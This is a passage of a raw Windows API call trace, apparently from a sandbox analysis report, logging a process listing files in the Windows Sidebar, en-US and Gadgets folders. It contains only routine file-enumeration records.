(cb=0x20c) returned 0x4e1c10 [0131.042] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.042] CoTaskMemFree (pv=0x4e1c10) [0131.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.042] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar", lpFilePart=0x0) returned 0x26 [0131.043] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.043] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.043] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0131.043] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b6cc007, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b6cc007, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xadcc4370, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0131.044] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c393c21, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c393c21, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0131.044] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0131.044] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e26afc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e26afc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3e4cc5c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0131.044] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd635db0, ftCreationTime.dwHighDateTime=0x1d4ee2a, ftLastAccessTime.dwLowDateTime=0xcd4c2120, ftLastAccessTime.dwHighDateTime=0x1d55fdc, ftLastWriteTime.dwLowDateTime=0xcd4c2120, ftLastWriteTime.dwHighDateTime=0x1d55fdc, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="variance.exe", cAlternateFileName="")) returned 1 [0131.045] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0131.045] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece79a10, ftCreationTime.dwHighDateTime=0x1d523bd, ftLastAccessTime.dwLowDateTime=0x4049e400, ftLastAccessTime.dwHighDateTime=0x1d502b8, ftLastWriteTime.dwLowDateTime=0x4049e400, ftLastWriteTime.dwHighDateTime=0x1d502b8, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="xlwaldeutsch.exe", cAlternateFileName="XLWALD~1.EXE")) returned 1 [0131.045] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.045] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.046] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xd0007960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xd0007960, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.046] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0131.046] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0131.046] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b6cc007, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b6cc007, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xadcc4370, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll", cAlternateFileName="")) returned 1 [0131.047] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c393c21, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c393c21, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0131.047] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shared Gadgets", cAlternateFileName="SHARED~1")) returned 1 [0131.047] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3e26afc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3e26afc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3e4cc5c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="sidebar.exe", cAlternateFileName="")) returned 1 [0131.047] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd635db0, ftCreationTime.dwHighDateTime=0x1d4ee2a, ftLastAccessTime.dwLowDateTime=0xcd4c2120, ftLastAccessTime.dwHighDateTime=0x1d55fdc, ftLastWriteTime.dwLowDateTime=0xcd4c2120, ftLastWriteTime.dwHighDateTime=0x1d55fdc, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="variance.exe", cAlternateFileName="")) returned 1 [0131.048] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b27b844, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x4b27b844, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1525cf0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wlsrvc.dll", cAlternateFileName="")) returned 1 [0131.048] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece79a10, ftCreationTime.dwHighDateTime=0x1d523bd, ftLastAccessTime.dwLowDateTime=0x4049e400, ftLastAccessTime.dwHighDateTime=0x1d502b8, ftLastWriteTime.dwLowDateTime=0x4049e400, ftLastWriteTime.dwHighDateTime=0x1d502b8, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="xlwaldeutsch.exe", cAlternateFileName="XLWALD~1.EXE")) returned 1 [0131.048] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece79a10, ftCreationTime.dwHighDateTime=0x1d523bd, ftLastAccessTime.dwLowDateTime=0x4049e400, ftLastAccessTime.dwHighDateTime=0x1d502b8, ftLastWriteTime.dwLowDateTime=0x4049e400, ftLastWriteTime.dwHighDateTime=0x1d502b8, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="xlwaldeutsch.exe", cAlternateFileName="XLWALD~1.EXE")) returned 0 [0131.048] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.048] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.048] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.049] CoTaskMemFree (pv=0x4e1c10) [0131.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.049] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\en-US", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\en-US", lpFilePart=0x0) returned 0x2c [0131.050] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.050] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0131.050] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0131.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.051] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.051] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0131.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 1 [0131.052] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sidebar.exe.mui", cAlternateFileName="")) returned 0 [0131.052] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.052] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0131.052] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0131.052] CoTaskMemFree (pv=0x4e1c10) [0131.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0131.053] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets", lpFilePart=0x0) returned 0x2e [0131.054] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.055] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0131.055] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0131.055] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0131.055] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0131.056] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0131.056] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0131.056] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0131.056] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0131.057] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 0 [0131.057] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0131.058] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8012b5d2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8012b5d2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0131.059] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, 